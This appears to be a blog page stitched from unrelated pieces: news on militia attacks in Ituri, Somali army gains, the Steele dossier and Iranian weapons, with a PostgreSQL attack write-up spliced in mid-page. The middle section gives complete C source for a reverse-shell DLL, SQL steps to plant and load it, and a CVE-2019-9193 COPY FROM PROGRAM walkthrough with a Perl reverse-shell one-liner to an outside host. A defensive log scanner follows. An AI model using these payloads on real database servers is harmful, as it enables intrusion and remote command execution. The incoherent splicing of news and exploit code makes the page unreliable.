Monday, June 29, 2020

Ituri province is on fire! 10 more people were killed by CODECO on the night of Sunday to Monday, 29/06/2020

Attackers from the CODECO militia carried out an attack on the night of Sunday to Monday, June 29, 2020, in the locality of Mungulumoya, 5 km from the centre of Kunda in the Babelebe chiefdom, Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded in this attack with firearms and bladed weapons.
Although the situation is now under the control of the Congolese security forces, the locality remains emptied of its population, which has moved en masse to the centre of Kunda, about ten kilometres from the city of Bunia.
Faced with this situation, provincial deputy Claude Malabo urges the Congolese state to better protect the inhabitants, who are being unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace following permanent threats," said this elected representative from Irumu's electoral district.
In addition to Djugu and Mahagi, in recent months certain entities in Irumu territory have also been targeted by this militia, the Cooperation for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
#define PG_REVSHELL_CALLHOME_PORT "4444"

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32")

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

#pragma warning(push)
#pragma warning(disable: 4996)
#define _WINSOCK_DEPRECATED_NO_WARNINGS

/* Runs when the library is loaded by the server process, i.e. as the
   operating-system user that runs PostgreSQL. */
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
                    _In_ DWORD fdwReason,
                    _In_ LPVOID lpvReserved)
{
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM,
                      IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host;
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr),
             inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
               NULL, NULL, NULL, NULL);

    /* The child's standard handles are the socket itself. */
    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput =
                            startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
                   NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
}
#pragma warning(pop) /* re-enable 4996 */

/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

/* The V1 info macro must name the exported function (the original read
   add_one, which does not exist in this file). */
PG_FUNCTION_INFO_V1(dummy_function);

Datum dummy_function(PG_FUNCTION_ARGS)
{
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
}
Here is the convoluted process of exploitation:

postgres=# CREATE TABLE hextable (hex bytea);
postgres=# CREATE TABLE lodump (lo OID);

acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt

postgres=# INSERT INTO lodump SELECT hex FROM hextable;
postgres=# SELECT * FROM lodump;
  lo
-------
 16409
(1 row)
postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
           'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

Arbitrary command execution on PostgreSQL

PostgreSQL, commonly known as Postgres, is one of the largest and most popular database systems in the world. It is the primary database of Mac OS X but also has Linux and Windows versions available.
For some time I have been dealing with PostgreSQL, and I have been keenly monitoring the less well-known 'feature' (CVE-2019-9193) which allows certain database users to gain arbitrary code execution in the context of the user running the Postgres instance. This is something which is enabled by default on all versions of PostgreSQL from 9.3 through to the latest, 11.2. It affects all operating systems: Windows, Linux and Mac.
Since version 9.3, new 'COPY TO/FROM PROGRAM' functionality has been available. It allows the database superuser, and any user in the 'pg_execute_server_program' group, to run arbitrary operating system commands. This effectively means there is no separation of privilege between a database superuser and the operating-system user running the database.
This is a lack of defence in depth which we used to see in Microsoft SQL Server back in the early 2000s, when the xp_cmdshell function was enabled by default. That was patched and disabled by default in Microsoft SQL Server 2005, but it is interesting how the same bugs repeat, seemingly in cycles.
As this bug/flaw/functionality/exploit sits somewhere between a privilege escalation and arbitrary code execution, it needs some kind of prior authentication. This is achieved either through access to the database with credentials, or via exploiting an SQL injection in an application that has PostgreSQL on the backend. In both cases, either the superuser or a user with 'pg_execute_server_program' permissions needs to be in use.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM 'id';
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be doubled to escape them, so for example if you wanted to run:
echo 'hello';
you would need to put it inside single quotes, and then replace each single quote inside with two single quotes:
'echo ''hello'';'
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OS X can usually be exploited with a Perl one-liner, with a command such as this:
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
I have simplified the exploitation process by releasing a new Metasploit module (which should be merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically if you provide it with valid database credentials which have the correct permissions. For SQL injections you will have to take the manual route. Here it's exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04:
For Windows, however, the NETWORK SERVICE user appears not to have any write privileges, but it was still possible to trigger a reverse shell by using a PowerShell download cradle. This can be provided by setting the COMMAND variable to the PowerShell cradle command; take note to escape single quotes with a backslash \.
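As an added example (not part of the original post), here is a small Python scanner for a defender's side of the two procedures above: it reads PostgreSQL statement-log lines and flags the three server-side primitives they rely on, COPY ... FROM/TO PROGRAM, lo_export of a large object to a shared-library path, and CREATE FUNCTION ... LANGUAGE C, undoing the '' quote doubling so the logged program string is reported as the server's shell received it. It assumes log_statement = 'all' and the log_line_prefix '%m [%p] %u@%d '; the log lines, role names and paths are constructed.

```python
import re

# Constructed sample statement-log lines (not from the page); assumes log_line_prefix '%m [%p] %u@%d '.
SAMPLE_LOG = r"""
2020-06-29 10:01:02.123 UTC [2211] app@shop LOG:  statement: SELECT * FROM orders WHERE id = 5;
2020-06-29 10:01:05.456 UTC [2211] app@shop LOG:  statement: COPY cmd_exec FROM PROGRAM 'echo ''hello''';
2020-06-29 10:02:10.789 UTC [2230] postgres@postgres LOG:  statement: SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll');
2020-06-29 10:02:12.001 UTC [2230] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS 'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;
2020-06-29 10:03:00.000 UTC [2240] app@shop LOG:  statement: COPY orders TO '/tmp/orders.csv' CSV;
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>\w+)@(?P<db>\w+) "
                     r"LOG:\s+statement: (?P<sql>.*)$")
LITERAL = r"'((?:[^']|'')*)'"  # one single-quoted SQL literal; '' is an escaped quote
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+" + LITERAL, re.I | re.S)
LO_EXPORT_RE = re.compile(r"\blo_export\s*\(\s*\d+\s*,\s*" + LITERAL, re.I)
C_FUNCTION_RE = re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*?\bLANGUAGE\s+C\b", re.I | re.S)

def unescape_literal(body):
    """Undo the '' doubling used inside a single-quoted SQL literal."""
    return body.replace("''", "'")

def classify(sql):
    """Return (rule, detail) when a statement reaches the server's OS or filesystem, else None."""
    m = COPY_PROGRAM_RE.search(sql)
    if m:  # the literal is the exact command line handed to the server's shell
        return "copy_program", unescape_literal(m.group(1))
    m = LO_EXPORT_RE.search(sql)
    if m:  # a large object written out to the server's filesystem
        path = unescape_literal(m.group(1))
        rule = "lo_export_library" if path.lower().endswith((".dll", ".so", ".dylib")) else "lo_export_file"
        return rule, path
    if C_FUNCTION_RE.search(sql):  # loads native code from a server-side shared library
        return "c_function", sql.strip()
    return None

def scan_log(text):
    """Parse each log line and collect flagged statements with the role and backend that ran them."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        hit = classify(m.group("sql")) if m else None
        if hit:
            findings.append({"user": m.group("user"), "db": m.group("db"),
                             "pid": m.group("pid"), "rule": hit[0], "detail": hit[1]})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['user']}@{f['db']} pid={f['pid']} {f['rule']}: {f['detail']}")
```

A plain COPY to or from a file is deliberately not flagged by the first rule, so the output stays focused on the program-execution and library-loading paths.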

The Somali National Army seized 4 strategic villages from Al-Shabaab this past weekend

The Somali National Army seized four new strategic villages from the Al-Shabaab militant group in Lower Juba region on Sunday.
The operations conducted by government troops took control of several villages in Lower Juba region, including Janay Abdale, Hilishid, Mayonde and Garasceebe.
Lieutenant Ismail Abdimalik Moalim, commander of the 16th brigade of the Danab forces, said the operations would continue until the troops had reached all areas controlled by Al-Shabaab fighters.
The commander of the Darwish forces in the Jubbaland region told the media that he had begun operations against the militants in the central town of Buale, but that more effort was still needed to capture it.
The forces have been conducting operations against Al-Shabaab in Lower Juba region in recent days to flush the militant group out of the region.

FBI refuses to reveal Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on innumerable inaccuracies in the dossier, which was cited extensively by the Bureau in its various applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents related to Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request filed by The Daily Caller, on the basis the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records for an individual identified as "Primary Sub-Source" in Justice Department inspector general Michael Horowitz's report on Crossfire Hurricane, issued December 2019. The assessment found Steele's source contradicted and dismissed key allegations made in the dossier after they were tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up "rumour and speculation" as fact, and the Justice Department ruled two FISA warrants to be invalid due to the Bureau's omission of this compromising information.
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
Republican lawmakers investigating the origins of the FBI's investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. For instance, Jim Jordan of the House Judiciary Committee has accused Wray of outright obstinacy, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote to Attorney General William Barr on April 20 demanding that all documents and communications related to the FBI's interviews with the source, including FBI reports written about the individual, be released.

Iran unveils new army weapons, including rocket launchers and missiles

The new weapons, developed by a Revolutionary Guards’ agency responsible for military R&D, have been unveiled amid the Trump administration’s ongoing effort to convince the international community to continue to enforce an arms embargo against Tehran after its October expiry date.
Gen. Ali Koohestani, director of the Revolutionary Guards’ Ground Force Self-Sufficiency Jihad Organization, has given Tasnim News Agency a sneak peek at several new weapons systems for use by infantry formations.
The arms include the Qare’a, a disposable, lightweight rocket launcher made of composite materials, which features a rocket engine-powered 80 mm caliber missile. The weapon is said to have an effective range of 250 meters, and to be ideal for anti-fortification use.

Another of the R&D agency’s designs is a man-portable recoilless rifle dubbed the Nafez-2 (‘Penetrator-2’), a 19 kg anti-armour system which can also be used against enemy emplacements.
Finally, Koohestani unveiled the Ashtar, a unique, lightweight 7.62x64 mm sniper rifle with a range of up to one kilometer and a 24x optical scope.

It’s not clear from the report what stage of development the weapons are in, or whether they have been delivered to the military.
The Tasnim report comes just a day after the IRGC unveiled other arms, including a new armoured personnel carrier, drone and truck-mounted heavy machine-gun, all of them also developed by the Guards’ Ground Force Research and Self-Sufficiency Jihad Organization.
Despite spending just a fraction of what its regional adversaries and the US do on defence, Iran has managed to gain self-sufficiency in a range of areas, becoming one of just a handful of countries capable of building advanced drones and air defence systems, for example. The country began making a push toward self-sufficiency in defence in the 1980s after its US and Western European partners cut Tehran off from its traditional sources of arms following the Iranian Revolution and the Iraqi invasion. Before that, throughout the 1960s and 1970s, the country was one of the largest importers of US weapons systems in the Middle East.
Further moves toward self-sufficiency followed in 2010, after the United Nations Security Council introduced a weapons embargo against the Islamic Republic over its alleged nuclear program.
After 2015 and the signing of the Iran nuclear deal, the UN committed to lift its arms embargo in October 2020. However, beginning earlier this year, the US has lobbied to keep the restrictions in place, going so far as to argue that for all intents and purposes, Washington is still a party to the nuclear deal it withdrew from in 2018. Russian and Chinese diplomats have dismissed US lobbying efforts and hinted that they would veto any American effort to extend the embargo.

ADF and Mai-Mai terrorising the Walese-Vonkutu chiefdom in Irumu territory, Ituri

The human rights NGO Convention for the Respect of Human Rights (CRDH) in Irumu territory, Ituri province, is raising the alarm over the illicit harassment and enrichment by Mayi-Mayi militiamen in several agglomerations of this territory in the Walese-Vonkutu chiefdom.
According to its coordinator Christophe Munyanderu, who presented the information on Saturday, June 27, 2020, the militiamen demand a sum of 3,000 Congolese francs as well as a quantity of food from the farming inhabitants, who had begun to return to this region after the recent attacks by the Ugandan ADF rebels.
"In general, in Irumu territory, there is the activism of armed groups, in particular the Mai-Mai militiamen in the Walese-Vonkutu chiefdom, while the latter commit atrocities on the population. They are demanding from each cultivator 3,000 FC and a quantity of food for their survival in this entity," he declares.
Christophe Munyanderu demands the urgent involvement of the competent authorities to resolve this situation. He wishes to see these militiamen dislodged from this area so that the population can live in peace.
Note that the Walese-Vonkutu chiefdom in Irumu territory is also facing the activism of the ADF rebels. The latter have repeatedly attacked the villages of Ndalya, Biane and Mufutabangi and the surrounding area, causing the death of several civilians and the massive displacement of survivors.